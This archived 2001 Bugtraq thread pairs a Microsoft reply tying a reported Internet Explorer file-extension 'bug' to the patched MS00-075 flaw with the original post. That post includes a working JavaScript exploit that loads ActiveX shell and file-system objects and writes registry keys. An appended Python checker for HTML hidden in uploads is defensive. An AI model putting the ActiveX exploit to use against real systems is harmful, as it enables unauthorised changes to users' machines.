RE: TXT or HTML? -- IE NEW BUG

From: Microsoft Security Response Center (secure@microsoft.com)
Date: 07/29/01


Subject: RE: TXT or HTML? -- IE NEW BUG
Date: Sun, 29 Jul 2001 08:09:59 -0700
Message-ID: <C10F7F33B880B248BCC47DB446738847038F968B@red-msg-07.redmond.corp.microsoft.com>
From: "Microsoft Security Response Center" <secure@microsoft.com>
To: "cr4zybird" <cr4zybird@hotmail.com>, <bugtraq@securityfocus.com>

Hi All -

We investigated this report when we received it on 20 July, and reported
our findings to the author. The short answer is that there doesn't
appear to be anything new here. However, because the report mixes
references to several different issues, it can be difficult to see why
this is.
* The Javascript listing below does indeed exploit a
vulnerability. However, it's a known vulnerability for which a patch has
been available since October 2000. The issue is discussed in Microsoft
Security Bulletin MS00-075
(http://www.microsoft.com/technet/security/bulletin/MS00-075.asp).
* If script were included within a .txt, .jpg or other file and
hosted on a web site, it could be opened automatically by a page on the
site. However, the script would run in the web page's domain, so it
would be subject to all the same limitations as script on the page
itself. That is, embedding the script within the file wouldn't gain the
attacker any capabilities.
* If a user could be convinced to download a .txt, .jpg or other
file to the desktop and then open it, either of two effects would
result, depending on the file type. Most file types don't open in IE by
default. For instance, .txt files open in Notepad by default. In these
cases, the script in the file wouldn't run. Other file types,
principally image files, do open in IE by default. However, when
they're opened from the local machine, they're sent directly to the
image rendering engine in IE, bypassing the script parser. Once again,
the script wouldn't run.
* Attached files in email are handled the same as downloaded
files. So again, either the file would open by default in a program
other than IE, or would open in a way that bypasses the script
interpreter.

Hope that helps explain the situation. Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center

-----Original Message-----
From: cr4zybird [mailto:cr4zybird@hotmail.com]
Sent: Friday, July 27, 2001 3:07 PM
To: bugtraq@securityfocus.com
Subject: TXT or HTML? -- IE NEW BUG

TXT or HTML? -- IE NEW BUG

vulnerable programs:

IE4, IE5, IE5, IE6, Microsoft Word, Microsoft Excel, Microsoft PowerPoint,
Tencent explorer (I've tested all the versions of IE that I can find, they
are all vulnerable)

description:

IE doesn't recognize the extensions of files, which may contain some html
code.

Write an HTML file in NOTEPAD. Save it as *.txt. Upload it to any server, then
use IE to visit this page. Found: IE executed the HTML code contained in the
*.txt file. And we can also change the extension, like *.jpg or other
non-downloaded files. Finally I found that IE can't recognize the extension
of a file.

Using this bug, anyone who knows how to make webpages can successfully
attack other people. Because of users' generic thought, they think only
.html/.htm can be used to attack, but now even .txt .jpg .png can do
everything that an html page can do! Even the e-mail attachment! Because
Outlook Express is vulnerable, too. Treat it seriously please.

Due to the company's not wanting to be responsible for this bug, please,
take it seriously, and be aware.

Here is a source code, just to prove the existence of this new bug.

<SCRIPT Language="JavaScript" type="text/javascript">
<!--
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
  try
  {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
      if (document.cookie.indexOf("Chg") == -1)
      {
        Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
        Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
        var expdate = new Date((new Date()).getTime() + (1));
        document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      }
    }
    catch(e)
    {}
  }
  catch(e)
  {}
}
function init()
{
  setTimeout("f()", 1000);
}
init();
// -->
</SCRIPT>

<img src=http://www.gnu.org/graphics/gnu-head-sm.jpg>

It's a .jpg which may change your IE title (you have to change the extension
to *.jpg first).

non-vulnerable programs:

netscape

solutions:

1) Download some antivirus software, and update the virus database all the
time. And change the name of some 'dangerous' programs in your system, such
as format.exe, deltree.exe etc., i.e. change format.exe to format_0.com etc.

2) Try not to visit those so-called 'hacker' or 'cracking' sites. Most of the
time, you are the victim while you want to learn to attack others.

3) If you have to go visit some site that you are not quite sure is
safe, then check it here first:

http://crazybird.51.net/look.htm

   Or you can also save the source code of this page to your computer, then
save it as *.htm, so you can execute it on your own comp. Be aware: if it
says "the web page contains some unsafe ActiveX" or something like that,
   then you'd better not execute that ActiveX widget. And I can't promise
that it can give you this kind of warning for any aggressive files..

4) DO NOT open your attachment in IE!!!!! Don't ever open any type of file in
IE directly!!! BE AWARE!! You'd better use antivirus to scan it before you
open it, after you've downloaded it to your computer.

5) Update the system patch immediately if the patch comes out.

If you still have questions, mail to:

cr4zybird@hotmail.com

Thanks to: springcream, skywind, nETMONKEY, xiajian, Nancy. They've given me
a lot of help on testing and communicating with Microsoft.

by:

crazybird

cr4zybird@hotmail.com

IRC: irc.sunnet.org 6667

#CNFORCE

26/7/01 China
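As an added example that is not part of either message in this thread, the Python below is the kind of server-side check a site operator can run over hosted or uploaded files to flag the case the thread describes: a .txt or image file whose leading bytes would be treated as HTML by a browser that sniffs content instead of trusting the extension. The magic-byte table, the tag list and the 256-byte sniff window are a simplified model chosen for illustration, not a reproduction of IE's actual sniffing rules; as the Microsoft reply notes, such script runs only in the hosting site's domain, so this check is for operators who do not want their own domain to serve it.

```python
"""Added example (not from either message in this thread): a server-side check
flagging files whose bytes would be treated as HTML despite a .txt or image
extension. The sniffing rules are a simplified model, not IE's real logic."""
import os
import re

# Magic-byte prefixes for the image types the thread mentions.
IMAGE_MAGIC = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
TEXT_EXTENSIONS = {".txt"}
SNIFF_WINDOW = 256  # only a short prefix is inspected, as historic sniffers did

# Leading tags a permissive sniffer takes as "this is HTML"; case-insensitive
# because the posted sample uses <SCRIPT ...>.
HTML_MARKERS = re.compile(
    rb"<\s*(?:!doctype\s+html|html|head|body|script|applet|object|embed|iframe|img|a)\b",
    re.IGNORECASE,
)

def looks_like_html(data: bytes) -> bool:
    """True if an HTML tag appears within the sniffed prefix of the file."""
    return HTML_MARKERS.search(data[:SNIFF_WINDOW]) is not None


def classify(filename: str, data: bytes) -> str:
    """Return 'ok', 'html-in-text', 'html-in-image' or 'bad-image-magic'."""
    ext = os.path.splitext(filename)[1].lower()
    if ext in IMAGE_MAGIC:
        if data.startswith(IMAGE_MAGIC[ext]):
            return "ok"  # genuine image header: the renderer gets it, not the parser
        return "html-in-image" if looks_like_html(data) else "bad-image-magic"
    if ext in TEXT_EXTENSIONS:
        return "html-in-text" if looks_like_html(data) else "ok"
    return "ok"  # .htm/.html and other types are expected to carry markup


# Constructed sample uploads, including a .txt and a .jpg that carry script.
SAMPLES = {
    "notes.txt": b"meeting at 10, bring <coffee>",
    "readme.txt": b'<SCRIPT Language="JavaScript">\n<!--\nalert(1);\n// -->\n</SCRIPT>',
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "photo2.jpg": b"  \r\n<html><body><script>alert(1)</script></body></html>",
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
    "broken.gif": b"not really an image",
}

if __name__ == "__main__":
    # Anything other than 'ok' should be rejected or served strictly as text/plain.
    for name, data in SAMPLES.items():
        print(f"{name:12} {classify(name, data)}")
```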
